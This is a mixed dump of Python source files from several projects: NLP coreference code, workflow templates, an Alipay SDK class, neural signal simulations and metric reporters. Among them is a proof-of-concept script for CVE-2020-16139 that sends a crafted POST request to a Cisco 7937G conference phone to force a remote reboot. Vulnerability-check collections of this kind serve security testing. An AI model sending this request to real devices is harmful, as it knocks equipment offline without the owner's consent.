from_gazette = gazette_manager.was_entry_created_by_gazette(alias, kind)
else:
from_gazette = False
if from_gazette:
kind = gazette_manager.strip_kind(kind)
key = alias
else:
key = "{} {} {} {}".format(entity_key_prefix, kind, i, j)
found_entities.append(FoundEntity(
key=key,
kind_name=kind,
alias=alias,
offset=i,
offset_end=j,
from_gazette=from_gazette
))
return found_entities
def get_entity_occurrences(self):
"""
Returns a list of tuples (i, j, kind) such that `i` is the start
offset of an entity occurrence, `j` is the end offset and `kind` is the
entity kind of the entity.
"""
found_entities = []
offset = 0
for words in self.sentences:
for kind, group in groupby(enumerate(words), key=lambda x: x[1]["NER"]):
if kind == "O":
continue
ix = [i for i, word in group]
i = ix[0] + offset
j = ix[-1] + 1 + offset
found_entities.append((i, j, kind))
offset += len(words)
return found_entities
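    # For example (illustrative): if the NER tags of a 5-token sentence are
    # O, PERSON, PERSON, O, LOCATION, this yields
    # [(1, 3, 'PERSON'), (4, 5, 'LOCATION')], i.e. half-open token spans.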
def get_coreferences(self):
"""
Returns a list of lists of tuples (i, j, k) such that `i` is the start
offset of a reference, `j` is the end offset and `k` is the index of the
head word within the reference.
All offsets are in tokens and relative to the start of the document.
All references within the same list refer to the same entity.
All references in different lists refer to different entities.
"""
sentence_offsets = self.get_sentence_boundaries()
coreferences = []
for mention in self._get("coreference", "coreference"):
occurrences = []
representative = 0
for r, occurrence in enumerate(_dict_path(mention, "mention")):
if "@representative" in occurrence:
representative = r
sentence = int(occurrence["sentence"]) - 1
offset = sentence_offsets[sentence]
i = int(occurrence["start"]) - 1 + offset
j = int(occurrence["end"]) - 1 + offset
k = int(occurrence["head"]) - 1 + offset
occurrences.append((i, j, k))
# Occurrences' representative goes in the first position
k = representative
            occurrences[0], occurrences[k] = occurrences[k], occurrences[0]
coreferences.append(occurrences)
return coreferences
def issues_merging_entities(document, entities):
    # Checks if some general preconditions are met before proceeding to merge
    # some entities on a given document
kinds = set(e.kind for e in entities)
if len(kinds) != 1:
return "Cannot merge entities of different kinds {!r}".format(kinds)
gazettes = set(e.gazette for e in entities if e.gazette)
if len(gazettes) > 1:
return "Cannot merge entities of different gazette items {!r}".format(gazettes)
def apply_coreferences(document, coreferences):
"""
    Makes all entity occurrences listed in `coreferences` have the same
    entity.
    It uses coreference information to merge the entity occurrences'
    entities into a single entity.
    `coreferences` is a list of tuples (i, j, head) where:
    - `i` is the offset in tokens where the occurrence starts.
    - `j` is the offset in tokens where the occurrence ends.
    - `head` is the index in tokens of the head of the occurrence (the "most
      important word").
    Every entity occurrence in `coreferences` might already exist or not in
    `document`. If no occurrence exists in `document` then nothing is done.
    If at least one occurrence exists in `document` then all other occurrences
    named in `coreferences` are automatically created.
    This function can raise CoreferenceError in case a merge is attempted on
    entities of different kinds.
"""
# For each token index make a list of the occurrences there
occurrences = defaultdict(list)
for occurrence in document.entity_occurrences.all():
for i in range(occurrence.offset, occurrence.offset_end):
occurrences[i].append(occurrence)
    entities = []  # Existing entities referenced by coreferences
pickable_as_representant = []
missing = [] # References that have no entity occurrence yet
for i, j, head in sorted(coreferences):
if occurrences[head]:
for x in occurrences[head]:
entities.append(x.entity)
if not x.anaphora:
pickable_as_representant.append(x.entity)
else:
missing.append((i, j, head))
if not pickable_as_representant:
return
issues = issues_merging_entities(document, entities)
if issues:
raise CoreferenceError(issues)
from_ner = [r for r in pickable_as_representant if not r.gazette]
if from_ner:
canonical = from_ner[0]
else:
canonical = pickable_as_representant[0]
# Each missing coreference needs to be created into an occurrence now
for i, j, head in missing:
if j - i >= 5: # If the entity is a long phrase then just keep one token
i = head
j = head + 1
EntityOccurrence.objects.get_or_create(
document=document,
entity=canonical,
offset=i,
offset_end=j,
alias=" ".join(document.tokens[i:j]),
defaults={'anaphora': True})
# Finally, the merging 'per se', where all things are entity occurrences
for entity in set(x for x in entities if x != canonical):
for occurrence in EntityOccurrence.objects.filter(entity=entity,
document=document):
occurrence.entity = canonical
occurrence.save()
|
couler/core/templates/template.py
|
dmerrick/couler
| 700 |
69379
|
<filename>couler/core/templates/template.py
# Copyright 2021 The Couler Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import OrderedDict
from couler.core import utils
class Template(object):
def __init__(
self,
name,
output=None,
input=None,
timeout=None,
retry=None,
pool=None,
enable_ulogfs=True,
daemon=False,
cache=None,
parallelism=None,
):
self.name = name
self.output = output
self.input = input
self.timeout = timeout
self.retry = retry
self.pool = pool
self.enable_ulogfs = enable_ulogfs
self.daemon = daemon
self.cache = cache
self.parallelism: int = parallelism
def to_dict(self):
template = OrderedDict({"name": self.name})
if self.daemon:
template["daemon"] = True
if self.timeout is not None:
template["activeDeadlineSeconds"] = self.timeout
if self.retry is not None:
template["retryStrategy"] = utils.config_retry_strategy(self.retry)
if self.cache is not None:
template["memoize"] = self.cache.to_dict()
if self.parallelism is not None:
template["parallelism"] = self.parallelism
return template
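    # Rough usage sketch (hypothetical values):
    #
    #   t = Template(name="train", timeout=3600, parallelism=2)
    #   t.to_dict()
    #   # -> OrderedDict([('name', 'train'),
    #   #                 ('activeDeadlineSeconds', 3600),
    #   #                 ('parallelism', 2)])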
|
alipay/aop/api/response/AlipayPcreditLoanCollateralCarQueryResponse.py
|
snowxmas/alipay-sdk-python-all
| 213 |
69380
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayPcreditLoanCollateralCarQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayPcreditLoanCollateralCarQueryResponse, self).__init__()
self._address = None
self._apply_no = None
self._car_brand_id = None
self._car_color = None
self._car_engine_no = None
self._car_mileage = None
self._car_model_id = None
self._car_reg_date = None
self._car_series_id = None
self._car_vin = None
self._cert_no = None
self._cert_type = None
self._created_time = None
self._lic_plate_address = None
self._lic_plate_no = None
self._name = None
@property
def address(self):
return self._address
@address.setter
def address(self, value):
self._address = value
@property
def apply_no(self):
return self._apply_no
@apply_no.setter
def apply_no(self, value):
self._apply_no = value
@property
def car_brand_id(self):
return self._car_brand_id
@car_brand_id.setter
def car_brand_id(self, value):
self._car_brand_id = value
@property
def car_color(self):
return self._car_color
@car_color.setter
def car_color(self, value):
self._car_color = value
@property
def car_engine_no(self):
return self._car_engine_no
@car_engine_no.setter
def car_engine_no(self, value):
self._car_engine_no = value
@property
def car_mileage(self):
return self._car_mileage
@car_mileage.setter
def car_mileage(self, value):
self._car_mileage = value
@property
def car_model_id(self):
return self._car_model_id
@car_model_id.setter
def car_model_id(self, value):
self._car_model_id = value
@property
def car_reg_date(self):
return self._car_reg_date
@car_reg_date.setter
def car_reg_date(self, value):
self._car_reg_date = value
@property
def car_series_id(self):
return self._car_series_id
@car_series_id.setter
def car_series_id(self, value):
self._car_series_id = value
@property
def car_vin(self):
return self._car_vin
@car_vin.setter
def car_vin(self, value):
self._car_vin = value
@property
def cert_no(self):
return self._cert_no
@cert_no.setter
def cert_no(self, value):
self._cert_no = value
@property
def cert_type(self):
return self._cert_type
@cert_type.setter
def cert_type(self, value):
self._cert_type = value
@property
def created_time(self):
return self._created_time
@created_time.setter
def created_time(self, value):
self._created_time = value
@property
def lic_plate_address(self):
return self._lic_plate_address
@lic_plate_address.setter
def lic_plate_address(self, value):
self._lic_plate_address = value
@property
def lic_plate_no(self):
return self._lic_plate_no
@lic_plate_no.setter
def lic_plate_no(self, value):
self._lic_plate_no = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
def parse_response_content(self, response_content):
response = super(AlipayPcreditLoanCollateralCarQueryResponse, self).parse_response_content(response_content)
if 'address' in response:
self.address = response['address']
if 'apply_no' in response:
self.apply_no = response['apply_no']
if 'car_brand_id' in response:
self.car_brand_id = response['car_brand_id']
if 'car_color' in response:
self.car_color = response['car_color']
if 'car_engine_no' in response:
self.car_engine_no = response['car_engine_no']
if 'car_mileage' in response:
self.car_mileage = response['car_mileage']
if 'car_model_id' in response:
self.car_model_id = response['car_model_id']
if 'car_reg_date' in response:
self.car_reg_date = response['car_reg_date']
if 'car_series_id' in response:
self.car_series_id = response['car_series_id']
if 'car_vin' in response:
self.car_vin = response['car_vin']
if 'cert_no' in response:
self.cert_no = response['cert_no']
if 'cert_type' in response:
self.cert_type = response['cert_type']
if 'created_time' in response:
self.created_time = response['created_time']
if 'lic_plate_address' in response:
self.lic_plate_address = response['lic_plate_address']
if 'lic_plate_no' in response:
self.lic_plate_no = response['lic_plate_no']
if 'name' in response:
self.name = response['name']
|
testcases/elichika_tests/node/Unpooling2D.py
|
vermashresth/chainer-compiler
| 116 |
69393
|
<filename>testcases/elichika_tests/node/Unpooling2D.py
# coding: utf-8
import chainer
import chainer.functions as F
class Unpooling2D(chainer.Chain):
def forward(self, x):
y = F.unpooling_2d(x, 2, cover_all=False)
return y
class Unpooling2D_3x4(chainer.Chain):
def forward(self, x):
y = F.unpooling_2d(x, (3, 4), cover_all=False)
return y
# ======================================
import numpy as np
from chainer_compiler.elichika import testtools
def main():
x = np.random.rand(2, 3, 11, 7).astype(np.float32)
testtools.generate_testcase(Unpooling2D, [x])
testtools.generate_testcase(Unpooling2D_3x4, [x], subname='3x4')
# The largest input in FPN.
x = np.random.rand(1, 256, 100, 100).astype(np.float32)
testtools.generate_testcase(Unpooling2D, [x], subname='large')
if __name__ == '__main__':
main()
|
seamseg/config/__init__.py
|
gladcolor/seamseg
| 282 |
69414
|
<filename>seamseg/config/__init__.py<gh_stars>100-1000
from .config import load_config, DEFAULTS
|
2020/CVE-2020-16139/poc/pocsploit/CVE-2020-16139.py
|
hjyuan/reapoc
| 421 |
69445
|
<filename>2020/CVE-2020-16139/poc/pocsploit/CVE-2020-16139.py
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Cisco 7937G Denial-of-Service Reboot Attack''',
"description": '''A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.''',
"severity": "high",
"references": [
"https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"cvss-score": "",
"cve-id": "CVE-2020-16139",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2020", "dos", "cisco"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"""
method = "POST"
data = """"""
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 200) and ("""application/xml""" in str(resp0.headers)) and ("""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""" in resp0.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
chrome/installer/mini_installer/generate_previous_version_mini_installer.py
|
zipated/src
| 2,151 |
69517
|
<reponame>zipated/src
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates a mini_installer with a lower version than an existing one."""
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--out', help='Path to the generated mini_installer.')
args = parser.parse_args()
assert args.out
return subprocess.call([
'alternate_version_generator.exe',
'--force',
'--previous',
'--out=' + args.out,
])
if '__main__' == __name__:
sys.exit(main())
|
neurodsp/sim/aperiodic.py
|
JanCBrammer/neurodsp
| 154 |
69532
|
"""Simulating time series, with aperiodic activity."""
import numpy as np
from scipy.stats import zscore
from scipy.linalg import toeplitz, cholesky
from neurodsp.filt import filter_signal, infer_passtype
from neurodsp.filt.fir import compute_filter_length
from neurodsp.filt.checks import check_filter_definition
from neurodsp.utils import remove_nans
from neurodsp.utils.checks import check_param_range
from neurodsp.utils.data import create_times, compute_nsamples
from neurodsp.utils.decorators import normalize
from neurodsp.spectral import rotate_powerlaw
from neurodsp.sim.transients import sim_synaptic_kernel
###################################################################################################
###################################################################################################
@normalize
def sim_poisson_pop(n_seconds, fs, n_neurons=1000, firing_rate=2):
"""Simulate a Poisson population.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
n_neurons : int, optional, default: 1000
Number of neurons in the simulated population.
firing_rate : float, optional, default: 2
Firing rate of individual neurons in the population.
Returns
-------
sig : 1d array
Simulated population activity.
Notes
-----
The simulated signal is essentially white noise, but satisfies the Poisson
property, i.e. mean(X) = var(X).
The lambda parameter of the Poisson process (total rate) is determined as
firing rate * number of neurons, i.e. summation of Poisson processes is still
a Poisson processes.
Note that the Gaussian approximation for a sum of Poisson processes is only
a good approximation for large lambdas.
Examples
--------
Simulate a Poisson population:
>>> sig = sim_poisson_pop(n_seconds=1, fs=500, n_neurons=1000, firing_rate=2)
"""
# Poisson population rate signal scales with # of neurons and individual rate
lam = n_neurons * firing_rate
# Variance is equal to the mean
sig = np.random.normal(loc=lam, scale=lam**0.5, size=compute_nsamples(n_seconds, fs))
# Enforce that sig is non-negative in cases of low firing rate
sig[np.where(sig < 0.)] = 0.
return sig
@normalize
def sim_synaptic_current(n_seconds, fs, n_neurons=1000, firing_rate=2.,
tau_r=0., tau_d=0.01, t_ker=None):
"""Simulate a signal as a synaptic current, which has 1/f characteristics with a knee.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
n_neurons : int, optional, default: 1000
Number of neurons in the simulated population.
firing_rate : float, optional, default: 2
Firing rate of individual neurons in the population.
tau_r : float, optional, default: 0.
Rise time of synaptic kernel, in seconds.
tau_d : float, optional, default: 0.01
Decay time of synaptic kernel, in seconds.
t_ker : float, optional
Length of time of the simulated synaptic kernel, in seconds.
Returns
-------
sig : 1d array
Simulated synaptic current.
Notes
-----
- This simulation is based on the one used in [1]_.
- The resulting signal is most similar to unsigned intracellular current or conductance change.
References
----------
.. [1] <NAME>., <NAME>., & <NAME>. (2017). Inferring synaptic
excitation/inhibition balance from field potentials. NeuroImage, 158, 70–78.
DOI: https://doi.org/10.1016/j.neuroimage.2017.06.078
Examples
--------
Simulate a synaptic current signal:
>>> sig = sim_synaptic_current(n_seconds=1, fs=500)
"""
# If not provided, compute t_ker as a function of decay time constant
if t_ker is None:
t_ker = 5. * tau_d
    # Simulate a bit of extra signal, since the convolution will trim it;
    # normalization is turned off here (mean=None, variance=None) and applied
    # to the final signal by the decorator instead
sig = sim_poisson_pop((n_seconds + t_ker), fs, n_neurons, firing_rate,
mean=None, variance=None)
ker = sim_synaptic_kernel(t_ker, fs, tau_r, tau_d)
sig = np.convolve(sig, ker, 'valid')[:compute_nsamples(n_seconds, fs)]
return sig
@normalize
def sim_knee(n_seconds, fs, chi1, chi2, knee):
"""Simulate a signal whose power spectrum has a 1/f structure with a knee.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
chi1 : float
Power law exponent before the knee.
chi2 : float
Power law exponent added to chi1 after the knee.
knee : float
Location of the knee in Hz.
Returns
-------
sig : 1d array
Time series with the desired power spectrum.
Notes
-----
This simulated time series has a power spectrum that follows the Lorentzian equation:
`P(f) = 1 / (f**chi1 * (f**chi2 + knee))`
- This simulation creates this power spectrum shape using a sum of sinusoids.
- The slope of the log power spectrum before the knee is chi1 whereas after the knee it is chi2,
but only when the sign of chi1 and chi2 are the same.
Examples
--------
Simulate a time series with chi1 of -1, chi2 of -2, and knee of 100:
    >>> sig = sim_knee(n_seconds=10, fs=1000, chi1=-1, chi2=-2, knee=100)
"""
times = create_times(n_seconds, fs)
n_samples = compute_nsamples(n_seconds, fs)
# Create frequencies for the power spectrum, which will be freqs of the summed cosines
freqs = np.linspace(0, fs/2, num=int(n_samples//2 + 1), endpoint=True)
# Drop the DC component
freqs = freqs[1:]
# Map the frequencies under the (square root) Lorentzian
# This will give us the amplitude coefficients for the sinusoids
cosine_coeffs = np.array([np.sqrt(1 / (freq ** -chi1 * (freq ** (-chi2 - chi1) + knee))) \
for freq in freqs])
# Add sinusoids with a random phase shift
sig = np.sum(np.array([cosine_coeffs[ell] * \
np.cos(2 * np.pi * freq * times + 2 * np.pi * np.random.rand()) \
for ell, freq in enumerate(freqs)]), axis=0)
return sig
@normalize
def sim_random_walk(n_seconds, fs, theta=1., mu=0., sigma=5.):
"""Simulate a mean-reverting random walk, as an Ornstein-Uhlenbeck process.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
theta : float, optional, default: 1.0
Memory scale parameter. Larger theta values create faster fluctuations.
mu : float, optional, default: 0.0
Mean of the random walk.
sigma : float, optional, default: 5.0
Standard deviation of the random walk.
Returns
-------
sig : 1d array
Simulated random walk signal.
Notes
-----
The random walk is simulated as a discretized Ornstein-Uhlenbeck process:
`dx = theta*(x-mu)*dt + sigma*dWt`
Where:
- mu : mean
- sigma : standard deviation
- theta : memory scale
- dWt : increments of Wiener process, i.e. white noise
See the wikipedia page [1]_ for the integral solution.
References
----------
.. [1] https://en.wikipedia.org/wiki/Ornstein-Uhlenbeck_process#Formal_solution
Examples
--------
Simulate a Ornstein-Uhlenbeck random walk:
>>> sig = sim_random_walk(n_seconds=1, fs=500, theta=1.)
"""
times = create_times(n_seconds, fs)
x0 = mu
dt = times[1] - times[0]
ws = np.random.normal(size=len(times))
ex = np.exp(-theta * times)
ws[0] = 0.
sig = x0 * ex + mu * (1. - ex) + sigma * ex * \
np.cumsum(np.exp(theta * times) * np.sqrt(dt) * ws)
return sig
@normalize
def sim_powerlaw(n_seconds, fs, exponent=-2.0, f_range=None, **filter_kwargs):
"""Simulate a power law time series, with a specified exponent.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
exponent : float, optional, default: -2
Desired power-law exponent, of the form P(f)=f^exponent.
f_range : list of [float, float] or None, optional
Frequency range to filter simulated data, as [f_lo, f_hi], in Hz.
**filter_kwargs : kwargs, optional
Keyword arguments to pass to `filter_signal`.
Returns
-------
sig : 1d array
Time-series with the desired power law exponent.
Notes
-----
- Powerlaw data with exponents is created by spectrally rotating white noise [1]_.
References
----------
.. [1] <NAME>., & <NAME>. (1995). On Generating Power Law Noise.
Astronomy and Astrophysics, 300, 707–710.
Examples
--------
Simulate a power law signal, with an exponent of -2 (brown noise):
>>> sig = sim_powerlaw(n_seconds=1, fs=500, exponent=-2.0)
Simulate a power law signal, with a highpass filter applied at 2 Hz:
>>> sig = sim_powerlaw(n_seconds=1, fs=500, exponent=-1.5, f_range=(2, None))
"""
# Compute the number of samples for the simulated time series
n_samples = compute_nsamples(n_seconds, fs)
# Get the number of samples to simulate for the signal
# If signal is to be filtered, with FIR, add extra to compensate for edges
if f_range and filter_kwargs.get('filter_type', None) != 'iir':
pass_type = infer_passtype(f_range)
filt_len = compute_filter_length(fs, pass_type,
*check_filter_definition(pass_type, f_range),
n_seconds=filter_kwargs.get('n_seconds', None),
n_cycles=filter_kwargs.get('n_cycles', 3))
n_samples += filt_len + 1
# Simulate the powerlaw data
sig = _create_powerlaw(n_samples, fs, exponent)
if f_range is not None:
sig = filter_signal(sig, fs, infer_passtype(f_range), f_range,
remove_edges=True, **filter_kwargs)
    # Drop the edges that were compensated for, if not using an IIR filter
if not filter_kwargs.get('filter_type', None) == 'iir':
sig, _ = remove_nans(sig)
return sig
@normalize
def sim_frac_gaussian_noise(n_seconds, fs, chi=0, hurst=None):
"""Simulate a timeseries as fractional gaussian noise.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
chi: float, optional, default: 0
Desired power law exponent of the spectrum of the signal.
Must be in the range (-1, 1).
hurst : float, optional, default: None
Desired Hurst parameter, which must be in the range (0, 1).
If provided, this value overwrites the `chi` parameter.
Returns
-------
sig: 1d array
Simulated fractional gaussian noise time series.
Notes
-----
The time series can be specified with either a desired power law exponent,
or alternatively with a specified Hurst parameter.
The Hurst parameter is not the Hurst exponent as defined in rescaled range analysis.
The Hurst parameter is defined for self-similar processes such that Y(at) = a^H Y(t)
for all a > 0, where this equality holds in distribution.
The relationship between the power law exponent chi and the Hurst parameter
    for fractional gaussian noise is chi = 1 - 2 * hurst, matching the conversion used below.
For more information, consult [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., & <NAME>. (2002). Fractal characterization of
complexity in temporal physiological signals. Physiological Measurement, 23(1), R1–R38.
DOI: https://doi.org/10.1088/0967-3334/23/1/201
Examples
--------
Simulate fractional gaussian noise with a power law decay of 0 (white noise):
>>> sig = sim_frac_gaussian_noise(n_seconds=1, fs=500, chi=0)
Simulate fractional gaussian noise with a Hurst parameter of 0.5 (also white noise):
>>> sig = sim_frac_gaussian_noise(n_seconds=1, fs=500, hurst=0.5)
"""
if hurst is not None:
check_param_range(hurst, 'hurst', (0, 1))
else:
check_param_range(chi, 'chi', (-1, 1))
# Infer the hurst parameter from chi
hurst = (-chi + 1.) / 2
# Compute the number of samples for the simulated time series
n_samples = compute_nsamples(n_seconds, fs)
# Define helper function for computing the auto-covariance
def autocov(hurst):
return lambda k: 0.5 * (np.abs(k - 1) ** (2 * hurst) - 2 * \
k ** (2 * hurst) + (k + 1) ** (2 * hurst))
# Build the autocovariance matrix
gamma = np.arange(0, n_samples)
gamma = np.apply_along_axis(autocov(hurst), 0, gamma)
autocov_matrix = toeplitz(gamma)
# Use the Cholesky factor to transform white noise to get the desired time series
white_noise = np.random.randn(n_samples)
cholesky_factor = cholesky(autocov_matrix, lower=True)
sig = cholesky_factor @ white_noise
return sig
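# Illustrative sketch, not part of the original module: a rough check of the
# spectral exponent of any of the simulations above, using a straight-line
# fit to the log-log FFT power spectrum. The helper name is hypothetical and
# the estimate is noisy for short signals; it reuses the module-level `np`.
def _estimate_spectral_exponent_sketch(sig, fs):
    freqs = np.fft.rfftfreq(len(sig), 1. / fs)[1:]
    power = np.abs(np.fft.rfft(sig))[1:] ** 2
    # Slope of log power vs log frequency approximates the exponent chi
    slope, _ = np.polyfit(np.log10(freqs), np.log10(power), 1)
    return slope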
@normalize
def sim_frac_brownian_motion(n_seconds, fs, chi=-2, hurst=None):
"""Simulate a timeseries as fractional brownian motion.
Parameters
----------
n_seconds : float
Simulation time, in seconds.
fs : float
Sampling rate of simulated signal, in Hz.
chi : float, optional, default: -2
Desired power law exponent of the spectrum of the signal.
Must be in the range (-3, -1).
hurst : float, optional, default: None
Desired Hurst parameter, which must be in the range (0, 1).
If provided, this value overwrites the `chi` parameter.
Returns
-------
sig : 1d array
Simulated fractional brownian motion time series.
Notes
-----
The time series can be specified with either a desired power law exponent,
or alternatively with a specified Hurst parameter.
    Note that when specifying chi, there can be some bias leading to a steeper than expected
    spectrum of the simulated signal. This bias is larger for chi values near to -1,
    and may be more severe in shorter signals.
The Hurst parameter is not the Hurst exponent in general. The Hurst parameter
is defined for self-similar processes such that Y(at) = a^H Y(t) for all a > 0,
where this equality holds in distribution.
The relationship between the power law exponent chi and the Hurst parameter
    for fractional brownian motion is chi = -2 * hurst - 1, matching the conversion used below.
For more information, consult [1]_ and/or [2]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., & <NAME>. (2002). Fractal characterization of
complexity in temporal physiological signals. Physiological Measurement, 23(1), R1–R38.
DOI: https://doi.org/10.1088/0967-3334/23/1/201
.. [2] <NAME>. (2004). Simulation of fractional Brownian motion. 77.
Examples
--------
Simulate fractional brownian motion with a power law exponent of -2 (brown noise):
>>> sig = sim_frac_brownian_motion(n_seconds=1, fs=500, chi=-2)
Simulate fractional brownian motion with a Hurst parameter of 0.5 (also brown noise):
>>> sig = sim_frac_brownian_motion(n_seconds=1, fs=500, hurst=0.5)
"""
if hurst is not None:
check_param_range(hurst, 'hurst', (0, 1))
else:
check_param_range(chi, 'chi', (-3, -1))
# Infer the hurst parameter from chi
hurst = (-chi - 1.) / 2
# Fractional brownian motion is the cumulative sum of fractional gaussian noise
fgn = sim_frac_gaussian_noise(n_seconds, fs, hurst=hurst)
sig = np.cumsum(fgn)
return sig
def _create_powerlaw(n_samples, fs, exponent):
"""Create a power law time series.
Parameters
----------
n_samples : int
The number of samples to simulate.
fs : float
Sampling rate of simulated signal, in Hz.
exponent : float
Desired power-law exponent, of the form P(f)=f^exponent.
Returns
-------
sig : 1d array
Time-series with the desired power law exponent.
Notes
-----
This function creates variable power law exponents by spectrally rotating white noise.
"""
# Start with white noise signal, that we will rotate, in frequency space
sig = np.random.randn(n_samples)
# Compute the FFT
fft_output = np.fft.fft(sig)
freqs = np.fft.fftfreq(len(sig), 1. / fs)
# Rotate spectrum and invert back to time series, with a z-score to normalize
# Delta exponent is divided by two, as the FFT output is in units of amplitude not power
fft_output_rot = rotate_powerlaw(freqs, fft_output, -exponent/2)
sig = zscore(np.real(np.fft.ifft(fft_output_rot)))
return sig
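# Illustrative sketch, not part of the original module: the overall effect of
# `_create_powerlaw` without the library's `rotate_powerlaw` and `zscore`
# utilities, whose exact conventions (DC handling, rotation frequency,
# normalization) may differ. The helper name is hypothetical; it scales FFT
# amplitudes by |f|**(exponent / 2) so that power goes as f**exponent.
def _powerlaw_from_white_noise_sketch(n_samples, fs, exponent):
    sig = np.random.randn(n_samples)
    fft_vals = np.fft.fft(sig)
    freqs = np.fft.fftfreq(n_samples, 1. / fs)
    mask = freqs != 0
    # Power is amplitude squared, so the amplitude exponent is exponent / 2
    fft_vals[mask] = fft_vals[mask] * np.abs(freqs[mask]) ** (exponent / 2.)
    fft_vals[~mask] = 0.
    return np.real(np.fft.ifft(fft_vals))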
|
pytext/metric_reporters/word_tagging_metric_reporter.py
|
baronrustamov/pytext
| 6,199 |
69534
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import itertools
import re
from collections import Counter
from typing import Dict, List, NamedTuple
from pytext.common.constants import DatasetFieldName, SpecialTokens, Stage
from pytext.data import CommonMetadata
from pytext.metrics import (
AllConfusions,
Confusions,
LabelPrediction,
PRF1Metrics,
compute_classification_metrics,
compute_multi_label_multi_class_soft_metrics,
)
from pytext.metrics.intent_slot_metrics import (
Node,
NodesPredictionPair,
Span,
compute_prf1_metrics,
)
from pytext.utils.data import merge_token_labels_to_slot, parse_slot_string
from .channel import Channel, ConsoleChannel, FileChannel
from .metric_reporter import MetricReporter
NAN_LABELS = [SpecialTokens.UNK, SpecialTokens.PAD]
def get_slots(word_names):
slots = {
Node(label=slot.label, span=Span(slot.start, slot.end))
for slot in parse_slot_string(word_names)
}
return Counter(slots)
class WordTaggingMetricReporter(MetricReporter):
def __init__(
self, label_names: List[str], use_bio_labels: bool, channels: List[Channel]
) -> None:
super().__init__(channels)
self.label_names = label_names
self.use_bio_labels = use_bio_labels
@classmethod
def from_config(cls, config, meta: CommonMetadata):
return cls(
meta.target.vocab.itos,
meta.target.use_bio_labels,
[ConsoleChannel(), FileChannel((Stage.TEST,), config.output_path)],
)
def calculate_loss(self):
total_loss = n_words = pos = 0
for loss, batch_size in zip(self.all_loss, self.batch_size):
num_words_in_batch = sum(
self.all_context["seq_lens"][pos : pos + batch_size]
)
pos = pos + batch_size
total_loss += loss * num_words_in_batch
n_words += num_words_in_batch
return total_loss / float(n_words)
def process_pred(self, pred: List[int]) -> List[str]:
"""pred is a list of token label index"""
return [self.label_names[p] for p in pred]
def calculate_metric(self):
return compute_prf1_metrics(
[
NodesPredictionPair(
get_slots(
merge_token_labels_to_slot(
token_range,
self.process_pred(pred[0:seq_len]),
self.use_bio_labels,
)
),
get_slots(slots_label),
)
for pred, seq_len, token_range, slots_label in zip(
self.all_preds,
self.all_context[DatasetFieldName.SEQ_LENS],
self.all_context[DatasetFieldName.TOKEN_RANGE],
self.all_context[DatasetFieldName.RAW_WORD_LABEL],
)
]
)[1]
def get_model_select_metric(self, metrics):
return metrics.micro_scores.f1
class MultiLabelSequenceTaggingMetricReporter(MetricReporter):
def __init__(self, label_names, pad_idx, channels, label_vocabs=None):
self.label_names = label_names
self.pad_idx = pad_idx
self.label_vocabs = label_vocabs
super().__init__(channels)
@classmethod
def from_config(cls, config, tensorizers):
return MultiLabelSequenceTaggingMetricReporter(
channels=[ConsoleChannel(), FileChannel((Stage.TEST,), config.output_path)],
label_names=tensorizers.keys(),
pad_idx=[v.pad_idx for _, v in tensorizers.items()],
label_vocabs=[v.vocab._vocab for _, v in tensorizers.items()],
)
def aggregate_tuple_data(self, all_data, new_batch):
assert isinstance(new_batch, tuple)
# num_label_set * bsz * ...
data = [self._make_simple_list(d) for d in new_batch]
# convert to bsz * num_label_set * ...
for d in zip(*data):
all_data.append(d)
def aggregate_preds(self, batch_preds, batch_context=None):
self.aggregate_tuple_data(self.all_preds, batch_preds)
def aggregate_targets(self, batch_targets, batch_context=None):
self.aggregate_tuple_data(self.all_targets, batch_targets)
